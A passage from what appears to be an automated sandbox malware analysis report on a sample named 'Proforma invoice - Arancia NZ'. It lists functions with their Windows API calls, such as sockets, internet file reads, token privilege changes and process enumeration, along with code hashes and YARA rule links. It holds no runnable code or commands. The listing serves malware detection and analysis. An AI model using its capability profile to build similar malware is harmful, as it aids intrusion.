                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279440585-0
                                                                                                                    • Opcode ID: 75b589801c859c0d3848f6cc4f4cfa3325da1c2a53a3fa6b3c9ec4cc207608f6
                                                                                                                    • Instruction ID: ff2d02c35f43d9d777a690d296c088f0908b34284d6cfc735557f6c1824153a0
                                                                                                                    • Opcode Fuzzy Hash: 75b589801c859c0d3848f6cc4f4cfa3325da1c2a53a3fa6b3c9ec4cc207608f6
                                                                                                                    • Instruction Fuzzy Hash: 5D21D030A102009FDB00EF64D94DF6EB7A9EF49720F248259E816A73D1CB70AD55CF55
                                                                                                                    Function 00265520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00270DB6: std::exception::exception.LIBCMT ref: 00270DEC
                                                                                                                      • Part of subcall function 00270DB6: __CxxThrowException@8.LIBCMT ref: 00270E01
                                                                                                                    • _memmove.LIBCMT ref: 002A0258
                                                                                                                    • _memmove.LIBCMT ref: 002A036D
                                                                                                                    • _memmove.LIBCMT ref: 002A0414
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1300846289-0
                                                                                                                    • Opcode ID: e0dbef2bbebd2bf20cdac9d7f457573b09ed94960d4623348fb5ec504b71760e
                                                                                                                    • Instruction ID: 84083f3d4217e0cf8acafe95ba414bbdb0f6385349259ec729464d9a1f5fd1ea
                                                                                                                    • Opcode Fuzzy Hash: e0dbef2bbebd2bf20cdac9d7f457573b09ed94960d4623348fb5ec504b71760e
                                                                                                                    • Instruction Fuzzy Hash: CB02D170A20205DBCF04DF64D9C1AAEBBB9EF45300F5480A9E80ADB255EB71DD64CF95
                                                                                                                    Function 00251287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 002519FA
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00251A4E
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00251A61
                                                                                                                      • Part of subcall function 00251290: DefDlgProcW.USER32(?,00000020,?), ref: 002512D8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ColorProc$LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3744519093-0
                                                                                                                    • Opcode ID: 72688202cfbeabb8d03fbf3034c80f81f598b41a0cbe5cfeb1eadc39862b918c
                                                                                                                    • Instruction ID: b6e4ccdfc7fb9d4cb249d3566d8f4b8d09dfd2776b7c4abb24d5a84f9a566ca1
                                                                                                                    • Opcode Fuzzy Hash: 72688202cfbeabb8d03fbf3034c80f81f598b41a0cbe5cfeb1eadc39862b918c
                                                                                                                    • Instruction Fuzzy Hash: 77A14878132586BAE62BAF285C58FBB255CDB4A343F14011EFC02D11D2CA709D39DB79
                                                                                                                    Function 002C6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C7DB6
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002C679E
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 002C67C7
                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 002C6800
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 002C680D
                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 002C6821
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 99427753-0
                                                                                                                    • Opcode ID: d5b0764efa4a91c46cc1f29c8fe6fcb694a7df639bcd3059c4c80f85dba80d7a
                                                                                                                    • Instruction ID: 6ddee37e5bad03a954c145ba4c4c633657c88dd4bdc20e109f845b281920d553
                                                                                                                    • Opcode Fuzzy Hash: d5b0764efa4a91c46cc1f29c8fe6fcb694a7df639bcd3059c4c80f85dba80d7a
                                                                                                                    • Instruction Fuzzy Hash: 9B41B275A20200AFEB50AF248C8AF6E77E8DF45714F04855CFD16AB3D2CAB09D548F95
                                                                                                                    Function 002D5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 292994002-0
                                                                                                                    • Opcode ID: 402739ab2e3b1aca2c8bf1f547c2080ce25e653101eecdaac694c9bff66296aa
                                                                                                                    • Instruction ID: 58fe825574948dc384fe6bbbe9c424cc5d47749a4634e9cd3f3c550b12368381
                                                                                                                    • Opcode Fuzzy Hash: 402739ab2e3b1aca2c8bf1f547c2080ce25e653101eecdaac694c9bff66296aa
                                                                                                                    • Instruction Fuzzy Hash: BC1108317219215FE7215F26EC48A5EBB9CEF443A1B40402AF846D7341CBF0DD11CA98
                                                                                                                    Function 002A80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A80C0
                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A80CA
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A80D9
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A80E0
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A80F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: ee86d347d6181f2faf88918d8b85da10d6a873cb2277b229cf125ca7b07e2ad8
                                                                                                                    • Instruction ID: 22e786574175e441bac68a018f2bfa732e822d7d7f1df782f688b5c07c207a9f
                                                                                                                    • Opcode Fuzzy Hash: ee86d347d6181f2faf88918d8b85da10d6a873cb2277b229cf125ca7b07e2ad8
                                                                                                                    • Instruction Fuzzy Hash: 68F0CD30612215AFEB100FA4EC8CE6B3BBCEF8A755B00002AF90AD3150CF60DD12DA60
                                                                                                                    Function 0025E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Dd1$Dd1$Dd1$Dd1$Variable must be of type 'Object'.
                                                                                                                    • API String ID: 0-908346732
                                                                                                                    • Opcode ID: 9dd51a27550972b25c1da29d5c4c9530b4b222d8b96554d92815bc920894a532
                                                                                                                    • Instruction ID: a043bd35ab5d7e6fea16f5db613513f6bee5e53b1c4ba1d2ba8abf8f898f5c02
                                                                                                                    • Opcode Fuzzy Hash: 9dd51a27550972b25c1da29d5c4c9530b4b222d8b96554d92815bc920894a532
                                                                                                                    • Instruction Fuzzy Hash: 33A28B74A20206CFCF28CF54C480AAAB7B5FF59315F258059EC059B351D774EE6ACB98
                                                                                                                    Function 00254B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00254AD0), ref: 00254B45
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00254B57
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                    • Opcode ID: ed6bec537d3a68d3fc7570c7e9d3581d50f7e90c1696bb2672132f690d4e6f09
                                                                                                                    • Instruction ID: ec8fdee6924f83ddc640a0127788e4759345e1c07fe2897b955ceca260ba3006
                                                                                                                    • Opcode Fuzzy Hash: ed6bec537d3a68d3fc7570c7e9d3581d50f7e90c1696bb2672132f690d4e6f09
                                                                                                                    • Instruction Fuzzy Hash: F4D01234E20713CFD7609F31E918B06B6D4AF06359B15883B9897D6650D770DCD0C65C
                                                                                                                    Function 002CEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 002CEE3D
                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 002CEE4B
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 002CEF0B
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 002CEF1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2576544623-0
                                                                                                                    • Opcode ID: 071a332146272510a09db9095603c75001bc419ee1e50519feb32f2c57a92099
                                                                                                                    • Instruction ID: a4a3c21f91955b95f9c01ab16e3aabe6ded29edf068fb3451d782170a343592e
                                                                                                                    • Opcode Fuzzy Hash: 071a332146272510a09db9095603c75001bc419ee1e50519feb32f2c57a92099
                                                                                                                    • Instruction Fuzzy Hash: B551AC71518311AFD310EF20DC85E6BB7E8EF94710F10492DF895972A1EB70E918CB96
                                                                                                                    Function 002AE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002AE628
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen
                                                                                                                    • String ID: ($|
                                                                                                                    • API String ID: 1659193697-1631851259
                                                                                                                    • Opcode ID: 5a62a44958e073c932d63cc2bf946956ea0a45004701d14cb824aa08e88dd30b
                                                                                                                    • Instruction ID: 50b71b4632b60905444f84b92f27c8105f88b71432ea6f7b5bf31828c6118959
                                                                                                                    • Opcode Fuzzy Hash: 5a62a44958e073c932d63cc2bf946956ea0a45004701d14cb824aa08e88dd30b
                                                                                                                    • Instruction Fuzzy Hash: C4322575A107059FDB28CF59C48196AB7F0FF48310B16C46EE89ADB3A1EB70E952CB44
                                                                                                                    Function 002C22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002C180A,00000000), ref: 002C23E1
                                                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 002C2418
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 599397726-0
                                                                                                                    • Opcode ID: cf597d88e4f6e484688dea052094bbd9febee9b0e7006c6631f4379e6401cab0
                                                                                                                    • Instruction ID: a76cbf7f1ddc323ac66520b3e3feb7732a145cb89d633553e44f1e83d9cebcdf
                                                                                                                    • Opcode Fuzzy Hash: cf597d88e4f6e484688dea052094bbd9febee9b0e7006c6631f4379e6401cab0
                                                                                                                    • Instruction Fuzzy Hash: 7B41047192420AFFEB20DE94DC85FBBB7ACEB40314F10416EFA05A7140DEB49E699A50
                                                                                                                    Function 002BB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 002BB343
                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 002BB39D
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 002BB3EA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1682464887-0
                                                                                                                    • Opcode ID: 4a8b0a1b7d53e2f7d8198ea1e6c222517cdef9f8f8aad209c2900de0a5a59d8a
                                                                                                                    • Instruction ID: 7a1d7d7860d0efa76000b60595fc3b3a769af048f8db3383ef88c3ab0bb0cfc7
                                                                                                                    • Opcode Fuzzy Hash: 4a8b0a1b7d53e2f7d8198ea1e6c222517cdef9f8f8aad209c2900de0a5a59d8a
                                                                                                                    • Instruction Fuzzy Hash: 7B216035A10618EFCB00EFA5D885AEDBBB8FF49311F1480AAE905AB351CB319D65CF54
                                                                                                                    Function 002A87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00270DB6: std::exception::exception.LIBCMT ref: 00270DEC
                                                                                                                      • Part of subcall function 00270DB6: __CxxThrowException@8.LIBCMT ref: 00270E01
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A882B
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A8858
                                                                                                                    • GetLastError.KERNEL32 ref: 002A8865
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1922334811-0
                                                                                                                    • Opcode ID: 84bfb98c1d5d5102b9d7d5ba55368b1f9743e193f055693acf2da421999e41c6
                                                                                                                    • Instruction ID: 26276d54076423fccbd55e9971b00263dfe90319286792bef382b17cf200593d
                                                                                                                    • Opcode Fuzzy Hash: 84bfb98c1d5d5102b9d7d5ba55368b1f9743e193f055693acf2da421999e41c6
                                                                                                                    • Instruction Fuzzy Hash: 791190B1824305AFD718DF94EC85D2BB7E8EB05310B10852EE45683201DE30AC508B60
                                                                                                                    Function 002A874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 002A8774
                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002A878B
                                                                                                                    • FreeSid.ADVAPI32(?), ref: 002A879B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3429775523-0
                                                                                                                    • Opcode ID: 57614fe386a768636e77bda44c71c57c7af39e1575a08513ff256cd561da8781
                                                                                                                    • Instruction ID: e6f7b9cd0ca00153206445c60cc466addeab658550223b8a4e8e5a8438aeb5b6
                                                                                                                    • Opcode Fuzzy Hash: 57614fe386a768636e77bda44c71c57c7af39e1575a08513ff256cd561da8781
                                                                                                                    • Instruction Fuzzy Hash: DDF04975E1130DBFDF00DFF4DD89AAEBBBCEF08201F5044A9A902E3281E6716A048B54
                                                                                                                    Function 002B8889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __time64.LIBCMT ref: 002B889B
                                                                                                                      • Part of subcall function 0027520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,002B8F6E,00000000,?,?,?,?,002B911F,00000000,?), ref: 00275213
                                                                                                                      • Part of subcall function 0027520A: __aulldiv.LIBCMT ref: 00275233
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                    • String ID: 0e1
                                                                                                                    • API String ID: 2893107130-2457772890
                                                                                                                    • Opcode ID: fe1717a292013ecb0a1a0eda30628b382b7a6c03e334d3feb6a8bdf121d1f731
                                                                                                                    • Instruction ID: d2adad1343f4702ec73448355393f2529ed2112b5a3250b2dbaa2d79318c1689
                                                                                                                    • Opcode Fuzzy Hash: fe1717a292013ecb0a1a0eda30628b382b7a6c03e334d3feb6a8bdf121d1f731
                                                                                                                    • Instruction Fuzzy Hash: D521B4326355118BC729CF65D841A92B3E5EFA9311F688E6CD0F9CB2C0CA74B905CB54
                                                                                                                    Function 002BC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002BC6FB
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BC72B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
